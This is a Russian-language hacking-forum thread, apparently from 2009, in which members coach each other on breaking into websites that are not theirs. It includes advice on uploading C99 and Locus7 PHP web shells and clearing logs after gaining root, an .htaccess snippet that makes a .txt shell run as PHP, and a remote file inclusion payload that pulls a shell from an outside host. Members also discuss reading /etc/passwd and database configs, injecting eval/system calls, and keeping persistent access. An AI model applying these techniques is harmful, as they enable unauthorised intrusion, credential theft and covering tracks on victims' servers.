Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    а шелл вот какой Locus7
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 navigat0r C99

    http://madnet.name/files/1/10.html
     
  3. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    ща попробую
     
  4. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    шелл от madneta не помогает, он всё выполняет без ошибок, но лог так и остался.Может недостаточно прав??Я получил рута, создал нового user с привелегиями рута(как вооще его содать). Как теперь запустить шелл от user? Такое возможно?
     
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Попробуй подключится к БД с учёки рута...
     
  6. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    как это сделать?? Использую putty ssh client.
     
  7. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    как это сделать?? Использую putty ssh client в виде интерактивного шелла.
     
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Подключись через с99
     
  9. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    собственно в этом то и проблема.Шелл с99 запускается из под www(user) который не обладает привилегиями рута.Как мне запустить с99 из под моего созданного пользователя??
     
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Подключись к БД от кого хочешь...
     
  11. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    как это от кого хочешь??!Ведь у бд есть только один user и passwd, они в конфиге в корне форума прописываются.Или я чего то не понимаю?
     
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    не понимаешь... К БД доступ может иметь N-ое кол-во акков) Если есть доступ к PHPMyAdmin, то через нее посмотри... Получить доступ к ней можно из данных таблицы mysql.user (не всегда ;) )
     
  13. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    как попасть в PHPMyAdmin? через админку??Или через шелл?Или ещё как нить?
     
  14. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Пхпмайадмин чаще всего установлен на хостинге, где хоститсо сайт...
     
  15. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    Ураааааааа, я проник к нему и загрузил шелл, только файл шелла с расширение .php
    Как его текстового запускать?
    А можно при помощи шелла добавить нового пользователя в бд?
    Как вот лучше закрепиться на его акаунте?
     
  16. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    в смысле как запускать? обратися по адресу де ты его загрузил и усе!
     
  17. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Создаёшь файл '.htaccess'

    внутри него:

    Code:
    <Files "[B]text.txt[/B]">
    AddType application/x-httpd-php .txt
    </Files>
    далее грузишь шелл с именем text.txt
    Ищи в шеле конфиги к базе данных внутри скриптов (логин;пароль;имя_базы) .. коннекться и создавай что за хочешь..

    Редактируй скрипты.. вставляй в них инклуды .. eval-ы passthru , system .. etc
     
    #6297 slider, 3 Apr 2009
    Last edited: 3 Apr 2009
  18. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    у меня такой вопрос,

    что полезного можно запустить или прочитать с помощью php-инклуда кроме /etc/passwd ?

    есть /etc/shadow но прав на чтение нету
     
  19. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    ищи какие нить конфиги и тд! Здесь мож глянуть шо читать http://forum.antichat.ru/thread49775.html
     
  20. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    1) Можешь найти ошибку и там будет путь: /home/host/site.ru/www/func/inc.php т.е. ты берешь путь home/host/site.ru/www/index.php и пробуешь прочитать файл. Если получится, то есть шанс найти конфиги коннекта к БД и подключиться!
    2) Попробуй так: page.php?filename=http://shell.ru/shell.txt? - Почему .txt? Потому что веб сервер его интерпритирует как .php ;)
     
Thread Status:
Not open for further replies.